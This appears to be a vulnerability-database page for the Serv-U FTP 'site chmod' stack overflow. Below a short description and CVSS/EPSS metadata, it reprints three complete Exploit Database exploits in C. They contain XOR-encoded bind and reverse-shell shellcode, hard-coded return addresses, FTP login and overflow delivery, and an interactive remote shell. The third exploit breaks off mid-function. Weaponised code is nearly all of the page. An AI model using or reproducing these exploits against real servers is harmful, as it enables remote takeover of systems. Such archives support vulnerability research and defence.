Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 149
Publication date : 2004-01-26 23h00 +00:00
Author : lion
EDB Verified : Yes
/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* : + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug find by kkqq kkqq@0x557.org ***
* : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
// for bind shellcode
#define BIND_OFFSET 91
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
#define SEH_OFFSET 0x193 //v3.0.0.20~v4.1.0.11
//#define SEH_OFFSET 0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN 2048
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "1.0"
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"}, //for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"}, //wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"}, //wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"}, //user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"}, //for all BG win2000 and winxp
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"}, //setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
char szDirectory[0x100];
// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";
// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";
void usage(char *p)
{
int i;
printf( "Usage:\t%s\t<-i ip> <-t type>\n"
"\t\t[-u user] [-p pass] [-d dir]\n"
"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
"[type]:\n" , p);
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
void main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;
printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
"Bug find by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
seh_offset = SEH_OFFSET;
if(argc < 4)
{
usage(argv[0]);
return;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'd':
if(argv[i+1][0] != '/')
strcpy(szDirectory, "/");
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
if(szDirectory[strlen(szDirectory)-1] != '/')
strcat(szDirectory, "/");
// correct the directory len
for(j=0;j<(strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, "x");
//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return;
}
if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return;
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "site chmod" command
strcpy(szCommand, "site chmod 777 ");
// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);
// fill the egg
for(i=0;i<seh_offset%8;i++)
strcat(szCommand, "\x90");
//strcat(szCommand, "BBBB");
// fill the seh
for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
{
strcat(szCommand, JMP_OVER);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode);
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
{
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return;
}
// printf("send size %d:%s", strlen(szCommand), szCommand);
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
__finally
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
}
return;
}
// milw0rm.com [2004-01-27]
Exploit Database EDB-ID : 23591
Publication date : 2004-01-23 23h00 +00:00
Author : mandragore
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
software: Serv-U 4.1.0.0
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
author: mandragore, sploiting@mandragore.solidshells.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#define fatal(x) { perror(x); exit(1); }
unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,
0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,
0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,
0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,
0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,
0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,
0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,
0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,
0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,
0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,
0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,
0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,
0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};
char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";
void usage(char *argv0) {
printf("usage: %s -d <ip_dest> [options]\n",argv0);
printf("options:\n");
printf(" -d target ip\n");
printf(" -p target port (default 21)\n");
printf(" -u username to log with (default %s)\n",user);
printf(" -s password to log with (default %s)\n",pass);
printf(" -w writable directory (default %s)\n",path);
printf(" -H listening host (default 127.0.0.1)\n");
printf(" -P listening port on host (default 80)\n");
printf("\n");
exit(1);
}
int main(int argc, char **argv) {
struct sockaddr_in saddr;
short port=21;
int target=0, lhost=0x0100007f;
int lport=80;
char *buff;
int s, ret, i;
int delta=423;
int callebx=0x10077A92; // libeay32.dll
char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
char chmod[]="SITE CHMOD 777 ";
printf("[%%] Serv-u v4.1.0.0 sploit by mandragore\n");
if (argc<2)
usage(argv[0]);
while((i = getopt(argc, argv, "d:p:u:s:w:H:P:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'u':
user=optarg;
break;
case 's':
pass=optarg;
break;
case 'w':
path=optarg;
break;
case 'H':
lhost=inet_addr(optarg);
break;
case 'P':
lport=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ((target==-1) || (lhost==-1))
usage(argv[0]);
printf("[.] if working you'll have a shell on %s:%d.\n", \
inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);
lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+0x5a,&lport,2);
lhost=lhost ^ 0x96969696;
memcpy(sc+0x53,&lhost,4);
buff=(char *)malloc(4096);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);
s=socket(2,1,6);
ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1)
fatal("[-] connect()");
ret=recv(s,buff,4095,0);
memset(buff+ret,0,1);
printf("%s",buff);
sprintf(buff,"USER %s\r\n",user);
printf("%s",buff);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
printf("%s",buff);
sprintf(buff,"PASS %s\r\n",pass);
printf("%s",buff);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
printf("%s",buff);
if (strstr(buff,"230")==0) {
printf("[-] bad login/pass combinaison\n");
exit(1);
}
sprintf(buff,"CWD %s\r\n",path);
printf("%s",buff);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
printf("%s",buff);
// verify directory
sprintf(buff,"PWD\r\n",path);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
i=strstr(buff+5,"\x22")-buff-5;
if (i!=1) i++; // trailing /
printf("[+] sending exploit..\n");
bzero(buff,4096);
memset(buff,0x90,600);
strcat(buff,"\r\n");
delta-=i; // strlen(path);
memcpy(buff,&chmod,strlen(chmod));
memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
memcpy(buff+delta-9,&jmpback,5+4);
memcpy(buff+delta,&callebx,4);
send(s,buff,602,0);
ret=recv(s,buff,1024,0);
if ((ret==0) || (ret==-1))
fatal("[-] ret()");
memset(buff+ret,0,1);
printf("%s",buff);
close(s);
printf("[+] done.\n");
exit(0);
}
Exploit Database EDB-ID : 23592
Publication date : 2004-01-24 23h00 +00:00
Author : mslug@safechina.net
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/9483/info
RhinoSoft Serv-U FTP Server is reportedly prone to a buffer overflow. The issue exists when a 'site chmod' command is issued on a non-existant file. If an excessively long filename is specified for the command, an internal buffer will be overrun, resulting in a failure of the FTP server. Execution of arbitrary code may be possible.
/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq@0x557.org
* exp coded by mslug@safechina.net
* Jan 25 2004
*/
/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/
#include <winsock2.h>
#include <stdio.h>
#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION -
strlen(ERR_HEADER))
// bindshell shellcode from www.cnhonker.org
#define PORT 53
#define PORT_OFFSET 176
//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one
unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
"\xd6\x19\x02\x75" //call_ebx = 0x750219d6
"\x33\xc0" //below: xor eax, eax
"\xb0\x1c" //mov al, 1c
"\x03\xd8" //add ebx, eax
"\xc6\x03\x90"; //mov byte ptr [ebx], 90
int main(int argc, char **argv)
{
WSADATA wsa;
unsigned short port;
int ftpsock, ret;
char recv_buf[1000];
unsigned long ip;
unsigned char buf[100];
printf("*******************************************\n");
printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
printf("* Vul discovered by kkqq@0x557.org *\n");
printf("* Coded by mslug@safechina.net *\n");
printf("*******************************************\n");
printf("\n");
if(argc<6) {
printf("serv.exe <host> <port> <user> <password> <path>\n");
return 0;
}
WSAStartup(MAKEWORD(2,2), &wsa);
port = htons(PORT)^(USHORT)0x9999;
memcpy(&bdshellcode[PORT_OFFSET], &port, 2);
ftpsock = connect_tcp(argv[1], atoi(argv[2]));
if(ftpsock < 0) {
printf("[-] Connection refused\n");
return 0;
}
ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);
sprintf(buf, "USER %s\r\n", argv[3]);
send(ftpsock, buf, strlen(buf), 0);
ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
recv_buf[ret] = 0;
printf("%s", recv_buf);
